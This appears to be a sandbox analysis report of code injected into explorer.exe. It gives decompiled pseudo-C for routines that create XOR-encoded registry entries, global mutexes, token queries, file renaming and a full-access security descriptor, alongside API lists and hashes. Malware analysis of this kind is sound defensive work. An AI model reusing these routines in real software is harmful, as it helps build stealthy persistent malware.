0x0008e08f
0x0008e08f
0x0008e095
0x00000000
0x00000000
0x0008e09b
0x0008e09f
0x0008e0a3
0x00000000
0x00000000
0x00000000
0x0008e0a3
0x0008e0a9
0x0008e0b1
0x0008e0b6
0x0008e0b9
0x0008e0b9
0x0008e0bb
0x0008e0bf
0x0008e0c7
0x00000000
0x00000000
0x0008e0cb
0x0008e0d3
0x00000000
0x00000000
0x00000000
0x0008e0d3

APIs

LoadLibraryA.KERNEL32(.dll), ref: 0008E0BF
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E0CB

Strings

.dll, xrefs: 0008E0BB, 0008E0BE

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: e6885038d973816d330ec086b720f4238475c46e79c454843e01917cf18b7a3a
Instruction ID: 9dcfbf0a2986d51c60a3d148e279124a35a2d10368e005c51dd708cc5af47f57
Opcode Fuzzy Hash: e6885038d973816d330ec086b720f4238475c46e79c454843e01917cf18b7a3a
Instruction Fuzzy Hash: 6531C431A002999BDB64EFADC884BAEBBF5BF44304F284869D885D7351DB70DD91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00089B24, Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00089B24(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000885E5(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B638(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895A8(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089273(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089273(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x14dfab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x14dfab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885A3( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x14dfab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C3BB(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000885FB( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000885FB( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000885FB( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089273(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x14dfab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x14dfab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895C2( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892C6(_v32);
							_v32 = _t179;
							E000885B6( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089237(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x14dfab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000885FB( &_v32, 0xfffffffe);
							E000885FB( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089273(_v12);
						_t171 =  *0x9e684; // 0x14df8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000885FB( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00089b2d
0x00089b2f
0x00089b32
0x00089b34
0x00089b3c
0x00089b3f
0x00089b46
0x00089b4e
0x00089b50
0x00089b56
0x00089b5f
0x00089b67
0x00089b6d
0x00089b74
0x00089b7a
0x00089b7c
0x00089b7f
0x00089b81
0x00089b81
0x00089b81
0x00089b89
0x00089b8c
0x00089b91
0x00089b94
0x00089b97
0x00089b99
0x00089ccf
0x00089ccf
0x00089cd5
0x00089cdc
0x00089d1d
0x00089d21
0x00089d22
0x00089d28
0x00089d2d
0x00089d30
0x00089d30
0x00089d32
0x00000000
0x00089d32
0x00089ce1
0x00089ceb
0x00089cf4
0x00089cf9
0x00089cfc
0x00089cff
0x00000000
0x00000000
0x00089d01
0x00089d05
0x00089d06
0x00089d0b
0x00089d0c
0x00089d0f
0x00089d13
0x00089d18
0x00000000
0x00089b9f
0x00089b9f
0x00089bac
0x00089bb2
0x00089bb5
0x00089bb7
0x00089ccc
0x00000000
0x00089ccc
0x00089bc0
0x00089bc4
0x00089bcc
0x00089bd3
0x00089bd6
0x00089bd9
0x00089d35
0x00089d38
0x00089d50
0x00089d53
0x00089d55
0x00089da9
0x00089dac
0x00089dae
0x00089db0
0x00089db0
0x00089db6
0x00089db9
0x00089db9
0x00089dbe
0x00089dc5
0x00089dcb
0x00089dd0
0x00089dd3
0x00089dd5
0x00089dec
0x00089df2
0x00000000
0x00000000
0x00000000
0x00000000
0x00089dd7
0x00089dd7
0x00089de3
0x00089de7
0x00089de8
0x00089de8
0x00000000
0x00089dd7
0x00089d5a
0x00089d67
0x00089d6a
0x00089d6c
0x00089d9b
0x00089d9e
0x00089da0
0x00089da2
0x00089da2
0x00089da4
0x00000000
0x00089da4
0x00089d6e
0x00089d77
0x00089d83
0x00089d8e
0x00000000
0x00089d93
0x00089bdf
0x00089be0
0x00089be3
0x00089be8
0x00089bec
0x00089bf1
0x00089bf4
0x00089bf7
0x00089bf9
0x00000000
0x00000000
0x00089c0a
0x00089c12
0x00089c15
0x00089c17
0x00089c8c
0x00089c94
0x00089c19
0x00089c1b
0x00089c2a
0x00089c32
0x00089c38
0x00089c3b
0x00089c43
0x00089c46
0x00089c50
0x00089c53
0x00089c58
0x00089c5b
0x00089c5d
0x00089c5f
0x00089c62
0x00089c64
0x00089c66
0x00089c66
0x00089c64
0x00089c72
0x00089c7d
0x00089c82
0x00089c85
0x00089c85
0x00089ca4
0x00089ca9
0x00089caf
0x00089cb2
0x00089cb4
0x00089cba
0x00089cc3
0x00000000
0x00089cc9
0x00089b99
0x00089b58
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cba189c52dc487266f4d4765987f02a3c3a86e56066f615df847474c1781fd4c
Instruction ID: 8bf3b9a9c04f0255c4ce92e5ae0d5093bb9bbef5c2286c786750eb7d5da8a5c5
Opcode Fuzzy Hash: cba189c52dc487266f4d4765987f02a3c3a86e56066f615df847474c1781fd4c
Instruction Fuzzy Hash: 8B9135B1900209AFDF10EFA8DC45DEEBBB8FF09310F54416AF554AB262DB359A00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008B9DA, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008B9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000885E5(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000885FB( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0008b9dd
0x0008b9de
0x0008b9e5
0x0008b9ed
0x0008b9f1
0x0008b9fa
0x0008ba40
0x0008ba40
0x0008ba07
0x0008ba0f
0x0008ba11
0x0008ba17
0x0008ba30
0x00000000
0x0008ba32
0x0008ba37
0x00000000
0x0008ba3d
0x0008ba19
0x0008ba19
0x0008ba19
0x0008ba19
0x0008ba17
0x0008ba46

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,6CB00000,00000000,00000000,?,0008BA79,?,00000000,?,0008D0EA), ref: 0008B9F5
GetLastError.KERNEL32(?,0008BA79,?,00000000,?,0008D0EA), ref: 0008B9FC

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA79,?,00000000,?,0008D0EA), ref: 0008BA2B

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 7b50840c5d4ca8a92fc3268e16af809517f3d843d570a18942236d7ce0dea842
Instruction ID: a9c503e0cae64907a1e68cf525398fbd1616b747265e97284885fd2e8896bcd7
Opcode Fuzzy Hash: 7b50840c5d4ca8a92fc3268e16af809517f3d843d570a18942236d7ce0dea842
Instruction Fuzzy Hash: F801A272600114BF9B74ABA9DC89D9F7FECFB457A0B104126F546E3121EB70DD0097A1

Uniqueness

Uniqueness Score: -1.00%

Function 000858FF, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000858FF(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A501(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x14df8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x00085903
0x00085908
0x00085914
0x00085921
0x00085925
0x0008593d
0x0008595d
0x0008595e
0x0008594d
0x0008594d
0x00085953
0x00085953
0x00085927
0x00085927
0x0008592d
0x0008592d
0x0008590a
0x0008590a
0x0008590a
0x00085966

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859C0,00085DB5,Global,0009BA14,?,00000000,?,00000002), ref: 0008591B
GetLastError.KERNEL32(?,?,000859C0,00085DB5,Global,0009BA14,?,00000000,?,00000002), ref: 00085927

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: de41b6c47ff43edfa5dbd0fb032d9d2ac535e5278922e25b23daeca3c6072156
Instruction ID: dfab0cbb1b8af053e8f6c9948d1446adefb4b73870bd4f76d174ff05d0e95ba8
Opcode Fuzzy Hash: de41b6c47ff43edfa5dbd0fb032d9d2ac535e5278922e25b23daeca3c6072156
Instruction Fuzzy Hash: 42F0FC31700814DBDA216769DC8497E76D8FBE6772B620366F9E9D72D0DB348C0443A2

Uniqueness

Uniqueness Score: -1.00%

Function 0008A4B3, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A4B3(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A501(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x0008a4bf
0x0008a4c7
0x0008a4cb
0x0008a4e2
0x0008a4f1
0x0008a4f7
0x0008a4fa
0x0008a4fa
0x00000000
0x0008a4fc
0x0008a4cd
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E07,00000000), ref: 0008A4C1
GetLastError.KERNEL32 ref: 0008A4CD
GetLastError.KERNEL32 ref: 0008A4D7

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: 6a00e3e2f29e851add9d5d36d327968f13b12ab8e73e95426c99d971b34d55ab
Instruction ID: 4d8f1db8761f9bee04cf57c6a7ba2903aea3f83be3b0366c5e6b1bcd68fe1fe6
Opcode Fuzzy Hash: 6a00e3e2f29e851add9d5d36d327968f13b12ab8e73e95426c99d971b34d55ab
Instruction Fuzzy Hash: 91F0E5323001209BFA602378D80DF5A3694BFD6791F021423F645CB621EEA8CC8083A2

Uniqueness

Uniqueness Score: -1.00%

Function 00086D81, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00086D81(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x14dfc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089E9B(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EE11(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892C6(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A4B3(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B2AB(_t59) == 0) {
								_t32 = E0008F191(_t59, 0x1388, _t74);
							}
							E0008A51D(_t56);
							_t41 =  *0x9e684; // 0x14df8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E000897ED( &_v544);
								_t43 =  *0x9e778; // 0x14dfc08
								_t53 = 0x33;
								if(E00089E9B(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C51(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1F3(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x14dfc08
									_t53 = 0x12;
									_t22 = E00089E9B(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A531(_t53, _t72) != 0) {
										_push(E000897ED(0));
										E00089621( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E000885FB( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x00086d81
0x00086d87
0x00086d8d
0x00086d9a
0x00086d9b
0x00086d9c
0x00086da3
0x00086da9
0x00086dae
0x00086db0
0x00086db2
0x00086dbe
0x00086dc3
0x00086dc3
0x00086dc8
0x00086dca
0x00086dcb
0x00086dd5
0x00086ddb
0x00086de0
0x00086de2
0x00086de5
0x00086deb
0x00086df1
0x00086df1
0x00086e07
0x00086e0b
0x00000000
0x00000000
0x00086e1a
0x00086e23
0x00086e23
0x00086e27
0x00086e2c
0x00086e33
0x00086e38
0x00086e3e
0x00086e43
0x00086e4b
0x00086e53
0x00086ea1
0x00086ea8
0x00086eaa
0x00086eae
0x00000000
0x00086eae
0x00086e55
0x00086e55
0x00086e5d
0x00086e5e
0x00086e63
0x00086e65
0x00086e77
0x00086e88
0x00086e8d
0x00086e96
0x00000000
0x00000000
0x00000000
0x00000000
0x00086e65
0x00086e53
0x00000000
0x00086e38
0x00086ebf
0x00086ec5
0x00086deb
0x00086ecc

APIs

MoveFileW.KERNEL32 ref: 00086E96

Strings

%s.%u, xrefs: 00086E79

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: bb16c603eebb5e4f14b26dcc143e5a887ebc535b2f659c5cffb9df98c1f5676f
Instruction ID: 4139d0d3afdab756ee988d5dfa7e7ec3c7fb0867fd7b8d81ce71e2a410f23da2
Opcode Fuzzy Hash: bb16c603eebb5e4f14b26dcc143e5a887ebc535b2f659c5cffb9df98c1f5676f
Instruction Fuzzy Hash: 1731BF313043006BF614FBB5DD96ABE3799BB90760F55042AF9919B283EF2ADD028752

Uniqueness

Uniqueness Score: -1.00%

Function 00082ADD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00082ADD() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E000885E5(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F13(0xe); // executed
						E000885FB( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x1460da0
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x1460da0
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E000895E2( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x00082ae3
0x00082aed
0x00082af0
0x00082af3
0x00082af8
0x00082afa
0x00082b00
0x00082b0a
0x00082b10
0x00082b12
0x00082b17
0x00082b74
0x00082b7a
0x00082b7e
0x00082b89
0x00000000
0x00082b90
0x00082b19
0x00082b1b
0x00082b1b
0x00082b24
0x00082b28
0x00082b30
0x00082b36
0x00082b36
0x00082b37
0x00082b3c
0x00082b40
0x00082b56
0x00082b5b
0x00082b61
0x00082b64
0x00082b67
0x00082b67
0x00082b69
0x00082b6a
0x00082b6d
0x00082b70
0x00000000
0x00082b1b
0x00000000

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

lstrcatA.KERNEL32(00000000,0009B99C,00085731,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,00085731), ref: 00082B30

Strings

%u;%u;%u, xrefs: 00082B4C

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: b762af15f0e3909c675c5f7ce009b084544c36c1f206e0d5413ae67cf1eecc0d
Instruction ID: 26ea8505adde5effaf1bd87c51140b3beee2636f22261527961e33119f607e6e
Opcode Fuzzy Hash: b762af15f0e3909c675c5f7ce009b084544c36c1f206e0d5413ae67cf1eecc0d
Instruction Fuzzy Hash: 0411D632A05600ABDB15EFE9DCC4EAABBB9FB84320B10456AE551D7151DB349900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008BD52, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008BD52() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x14dfab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x14dfab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x14dfab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x14dfab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x14dfab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x14dfab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x0008bd5d
0x0008bd60
0x0008bd68
0x0008bd6e
0x0008bd71
0x0008bd76
0x0008bd7c
0x0008bd7d
0x0008bd7e
0x0008bd7f
0x0008bd80
0x0008bd81
0x0008bd82
0x0008bd83
0x0008bd86
0x0008bd89
0x0008bd8b
0x0008bd8e
0x0008bd92
0x0008bd95
0x0008bd96
0x0008bd9b
0x0008bda2
0x0008be96
0x0008be9a
0x0008be9c
0x0008bea4
0x0008bea4
0x0008beab
0x0008bead
0x0008beb5
0x0008beb5
0x0008beba
0x0008bebc
0x0008bec2
0x0008bec2
0x0008bec9
0x0008becb
